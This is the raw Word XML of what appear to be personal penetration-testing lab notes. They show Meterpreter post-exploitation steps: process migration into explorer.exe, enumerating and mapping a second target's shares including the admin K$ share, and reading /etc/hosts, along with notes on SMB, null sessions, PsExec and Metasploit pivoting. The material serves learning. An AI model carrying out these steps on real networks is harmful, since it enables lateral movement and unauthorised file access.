    <w:p w14:paraId="33C7AE58" w14:textId="5942B9B8" w:rsidR="00A12517" w:rsidRDefault="00A12517" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>move</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A2CA93" w14:textId="77777777" w:rsidR="00A12517" w:rsidRDefault="00A12517" w:rsidP="005E3287"/>
    <w:p w14:paraId="57A7785E" w14:textId="57D513ED" w:rsidR="00A12517" w:rsidRDefault="00A12517" w:rsidP="005E3287">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C9C6B6" w14:textId="49D2C759" w:rsidR="00A12517" w:rsidRDefault="00A12517" w:rsidP="005E3287">
      <w:r>
        <w:t>Net view target2_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D940E" w14:textId="2C958CC5" w:rsidR="00A12517" w:rsidRDefault="00A12517" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="000E1180" w:rsidRPr="000E1180">
        <w:t xml:space="preserve">Shows the list of </w:t>
      </w:r>
      <w:r w:rsidR="000E1180" w:rsidRPr="000E1180">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shared resources</w:t>
      </w:r>
      <w:r w:rsidR="000E1180" w:rsidRPr="000E1180">
        <w:t xml:space="preserve"> on the remote host (target2_ip</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000E1180" w:rsidRPr="000E1180">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00C959FD">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C959FD">
        <w:t>access is denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17164D13" w14:textId="4784A736" w:rsidR="00C959FD" w:rsidRDefault="00C959FD" w:rsidP="005E3287">
      <w:r>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB5FE4" w14:textId="28D6597B" w:rsidR="00C959FD" w:rsidRDefault="00C959FD" w:rsidP="005E3287">
      <w:r>
        <w:t>Migrate -N explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBC2009" w14:textId="0E19FF2A" w:rsidR="00C959FD" w:rsidRDefault="00C959FD" w:rsidP="005E3287">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0F125" w14:textId="4E104D2C" w:rsidR="00C959FD" w:rsidRDefault="00C959FD" w:rsidP="005E3287">
      <w:r>
        <w:t>Net view target2_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFB4E94" w14:textId="2B0C51F0" w:rsidR="00C959FD" w:rsidRDefault="00C959FD" w:rsidP="005E3287">
      <w:r>
        <w:t>#now output shown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8B03C6" w14:textId="77777777" w:rsidR="00C959FD" w:rsidRDefault="00C959FD" w:rsidP="005E3287"/>
    <w:p w14:paraId="331C7843" w14:textId="7600FD3D" w:rsidR="00C959FD" w:rsidRDefault="00C959FD" w:rsidP="005E3287">
      <w:r>
        <w:t>net use D: \\</w:t>
      </w:r>
      <w:r w:rsidRPr="00C959FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>target2_ip\Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C20B0CB" w14:textId="46D57170" w:rsidR="000E1180" w:rsidRPr="000E1180" w:rsidRDefault="000E1180" w:rsidP="000E1180">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1180">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Maps</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1180">
        <w:t xml:space="preserve"> the remote share \\target2_ip\Documents to local drive letter </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E1180">
        <w:t>D:.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D2B4938" w14:textId="363FC0D5" w:rsidR="000E1180" w:rsidRPr="000E1180" w:rsidRDefault="000E1180" w:rsidP="000E1180">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="000E1180">
        <w:t xml:space="preserve">If successful you’ll see: The command completed successfully. and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E1180">
        <w:t>D:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E1180">
        <w:t xml:space="preserve"> becomes a mounted network drive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A639D8E" w14:textId="20A4AB48" w:rsidR="00A12517" w:rsidRDefault="00A12517" w:rsidP="005E3287"/>
    <w:p w14:paraId="7E029EAE" w14:textId="436076AD" w:rsidR="00D203A6" w:rsidRDefault="00C959FD" w:rsidP="005E3287">
      <w:r>
        <w:t>net use K: \\</w:t>
      </w:r>
      <w:r w:rsidRPr="00C959FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>target2_ip\K$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF4AB5" w14:textId="43A38128" w:rsidR="000E1180" w:rsidRDefault="000E1180" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="000E1180">
        <w:t xml:space="preserve">Maps the </w:t>
      </w:r>
      <w:r w:rsidRPr="000E1180">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>administrative hidden share</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1180">
        <w:t xml:space="preserve"> K$ (root of drive K: on the remote machine) to local </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E1180">
        <w:t>K:.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2463DB28" w14:textId="77777777" w:rsidR="000E1180" w:rsidRPr="000E1180" w:rsidRDefault="000E1180" w:rsidP="005E3287"/>
    <w:p w14:paraId="0422145F" w14:textId="09A50D94" w:rsidR="00D203A6" w:rsidRDefault="00C959FD" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> D:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DCDF0" w14:textId="38EBF7FF" w:rsidR="00C959FD" w:rsidRDefault="00C959FD" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> K:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BED511" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287"/>
    <w:p w14:paraId="3EBC427A" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287"/>
    <w:p w14:paraId="0C29999F" w14:textId="77777777" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287"/>
    <w:p w14:paraId="5DB6FE34" w14:textId="2EC443BB" w:rsidR="004D4F9D" w:rsidRPr="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now for second system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2245F748" w14:textId="7E8E3F83" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32D31E" w14:textId="77777777" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287"/>
    <w:p w14:paraId="78CD448D" w14:textId="77777777" w:rsidR="005E3287" w:rsidRDefault="005E3287" w:rsidP="005E3287"/>
    <w:p w14:paraId="252CA65A" w14:textId="77777777" w:rsidR="005E3287" w:rsidRDefault="005E3287" w:rsidP="005E3287"/>
    <w:p w14:paraId="57DD2973" w14:textId="77777777" w:rsidR="005E3287" w:rsidRDefault="005E3287" w:rsidP="005E3287"/>
    <w:p w14:paraId="46231C31" w14:textId="77777777" w:rsidR="005E3287" w:rsidRDefault="005E3287" w:rsidP="005E3287"/>
    <w:p w14:paraId="534B9F3F" w14:textId="76F3A168" w:rsidR="005E3287" w:rsidRDefault="005E3287" w:rsidP="005E3287">
      <w:r>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CF442" w14:textId="77777777" w:rsidR="005E3287" w:rsidRPr="00944482" w:rsidRDefault="005E3287" w:rsidP="005E3287">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF0AC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetBIOS = Helper service (names &amp; sessions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7713724C" w14:textId="77777777" w:rsidR="005E3287" w:rsidRPr="00944482" w:rsidRDefault="005E3287" w:rsidP="005E3287">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF0AC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SMB = The protocol that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF0AC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>actually does</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF0AC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> file sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5A710" w14:textId="05CD3793" w:rsidR="005E3287" w:rsidRDefault="005E3287">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Modern networks rely on </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3287">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB for file and printer sharing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, often using </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3287">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and other mechanisms for name resolution instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3287">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetBIOS</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6117D3B9" w14:textId="77777777" w:rsidR="005E3287" w:rsidRDefault="005E3287"/>
    <w:p w14:paraId="18F059E8" w14:textId="5E8D679E" w:rsidR="00473846" w:rsidRPr="00473846" w:rsidRDefault="00473846">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00473846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port 139 SMB over NetBIOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A8EB7" w14:textId="77777777" w:rsidR="00473846" w:rsidRPr="00473846" w:rsidRDefault="00473846" w:rsidP="00473846">
      <w:r w:rsidRPr="00473846">
        <w:t xml:space="preserve">This means </w:t>
      </w:r>
      <w:r w:rsidRPr="00473846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>newer Windows systems can still “fall back” to using SMB over NetBIOS (port 139)</w:t>
      </w:r>
      <w:r w:rsidRPr="00473846">
        <w:t xml:space="preserve"> if they talk to older machines that don’t support direct SMB over port 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81CF81" w14:textId="77777777" w:rsidR="00473846" w:rsidRPr="00473846" w:rsidRDefault="00473846" w:rsidP="00473846">
      <w:r w:rsidRPr="00473846">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00473846">
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ACED2F" w14:textId="2EF0651F" w:rsidR="005E3287" w:rsidRDefault="00473846">
      <w:r w:rsidRPr="00473846">
        <w:t xml:space="preserve">If a </w:t>
      </w:r>
      <w:r w:rsidRPr="00473846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows 10 PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00473846">
        <w:t xml:space="preserve"> connects to a very old </w:t>
      </w:r>
      <w:r w:rsidRPr="00473846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows XP PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00473846">
        <w:t>, and XP only supports SMB1 via NetBIOS (port 139), the Windows 10 system can still use port 139 (if enabled) to remain compatible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105BF1D0" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1"/>
    <w:p w14:paraId="21A9F1A1" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRPr="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="00E67AF1">
      <w:r w:rsidRPr="00E67AF1">
        <w:t xml:space="preserve">The file </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67AF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E67AF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E67AF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67AF1">
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67AF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local text file</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67AF1">
        <w:t xml:space="preserve"> on Unix/Linux (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E67AF1">
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E67AF1">
        <w:t xml:space="preserve"> exists in Windows as </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67AF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\Windows\System32\drivers\etc\hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67AF1">
        <w:t xml:space="preserve">) that maps </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67AF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hostnames to IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67AF1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F39BCB" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1"/>
    <w:p w14:paraId="0FDF2048" w14:textId="3A84645B" w:rsidR="007939D3" w:rsidRDefault="007939D3">
      <w:r w:rsidRPr="007939D3">
        <w:t xml:space="preserve">Null sessions (anonymous access) are a known vulnerability in </w:t>
      </w:r>
      <w:r w:rsidRPr="007939D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMBv1</w:t>
      </w:r>
      <w:r w:rsidRPr="007939D3">
        <w:t>, allowing attackers to connect without authentication and enumerate information (users, shares, groups, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B34FB0" w14:textId="77777777" w:rsidR="007939D3" w:rsidRDefault="007939D3"/>
    <w:p w14:paraId="6E487BA1" w14:textId="5652AB1F" w:rsidR="007939D3" w:rsidRDefault="007939D3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007939D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E0A4BA" w14:textId="17CF9D2F" w:rsidR="007939D3" w:rsidRDefault="007939D3">
      <w:r w:rsidRPr="007939D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="007939D3">
        <w:t xml:space="preserve"> remotely execute commands, spawn interactive shells, install/run programs or services for administration or penetration testing — requires valid credentials and admin rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6E9327" w14:textId="77777777" w:rsidR="00796EE5" w:rsidRDefault="00796EE5"/>
    <w:p w14:paraId="6701A86C" w14:textId="13F76568" w:rsidR="00796EE5" w:rsidRDefault="00796EE5">
      <w:r w:rsidRPr="00796EE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00796EE5">
        <w:t xml:space="preserve"> = the </w:t>
      </w:r>
      <w:r w:rsidRPr="00796EE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>most privileged accou</w:t>
      </w:r>
      <w:r w:rsidRPr="00425BF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:r w:rsidRPr="00796EE5">
        <w:t xml:space="preserve"> in Windows, used by the OS itself to run system-level tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C7D8D" w14:textId="77777777" w:rsidR="00796EE5" w:rsidRDefault="00796EE5"/>
    <w:p w14:paraId="4BD90308" w14:textId="53E2DEEE" w:rsidR="00D203A6" w:rsidRDefault="00D203A6">
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve">autoroute = </w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pivoting tool in Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve"> → lets you route attacks through a compromised machine to reach internal networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23622C22" w14:textId="77777777" w:rsidR="00796EE5" w:rsidRDefault="00796EE5"/>
    <w:p w14:paraId="6AC953D3" w14:textId="40270393" w:rsidR="000E1180" w:rsidRDefault="000E1180">
      <w:r w:rsidRPr="000E1180">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important:</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1180">
        <w:t xml:space="preserve"> K$, C$, D$, etc. are admin-only hidden shares — you need </w:t>
      </w:r>
      <w:r w:rsidRPr="000E1180">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1180">
        <w:t xml:space="preserve"> credentials on the target to access them. If you are not admin, this will fail with Access is denied.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000E1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8310C" w14:textId="77777777" w:rsidR="00582A31" w:rsidRDefault="00582A31" w:rsidP="00E67AF1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1008FDDE" w14:textId="77777777" w:rsidR="00582A31" w:rsidRDefault="00582A31" w:rsidP="00E67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FD357" w14:textId="77777777" w:rsidR="00582A31" w:rsidRDefault="00582A31" w:rsidP="00E67AF1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="37486988" w14:textId="77777777" w:rsidR="00582A31" w:rsidRDefault="00582A31" w:rsidP="00E67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4DB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54A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0D34"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BEE9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78282D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="011A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C14A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14FC4E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C32EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B3A4CA6"/>
    <w:lvl w:ilvl="0" w:tplc="09A0887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071DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9FF8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E03BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD24AE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C3436"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="695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42DAA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="422C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271637">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1407651883">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="482158877">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="250510057">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1710912063">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1778522390">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="948976263">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="837421563">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="467088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EC"/>
    <w:rsid w:val="000E1180"/>
    <w:rsid w:val="00174563"/>
    <w:rsid w:val="001A6DB9"/>
    <w:rsid w:val="00206EBE"/>
    <w:rsid w:val="002B6425"/>
    <w:rsid w:val="002C60EC"/>
    <w:rsid w:val="002E1C96"/>
    <w:rsid w:val="00425BF3"/>
    <w:rsid w:val="00473846"/>
    <w:rsid w:val="00496241"/>
    <w:rsid w:val="004B5B81"/>
    <w:rsid w:val="004D4F9D"/>
    <w:rsid w:val="004E7175"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00582A31"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00596087"/>
    <w:rsid w:val="005C3320"/>
    <w:rsid w:val="005E3287"/>
    <w:rsid w:val="0060594E"/>
    <w:rsid w:val="007939D3"/>
    <w:rsid w:val="00796EE5"/>
    <w:rsid w:val="007C1991"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="009139EB"/>
    <w:rsid w:val="00917DF0"/>
    <w:rsid w:val="00944482"/>
    <w:rsid w:val="00964116"/>
    <w:rsid w:val="009D4477"/>
    <w:rsid w:val="00A12517"/>
    <w:rsid w:val="00C959FD"/>
    <w:rsid w:val="00D203A6"/>
    <w:rsid w:val="00E20F83"/>
    <w:rsid w:val="00E376B0"/>
    <w:rsid w:val="00E67AF1"/>
    <w:rsid w:val="00EF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3300"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F5E66328-346D-4730-85D0-B19F0418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0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AF1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E67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AF1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E118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39</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-25T04:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-25T06:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>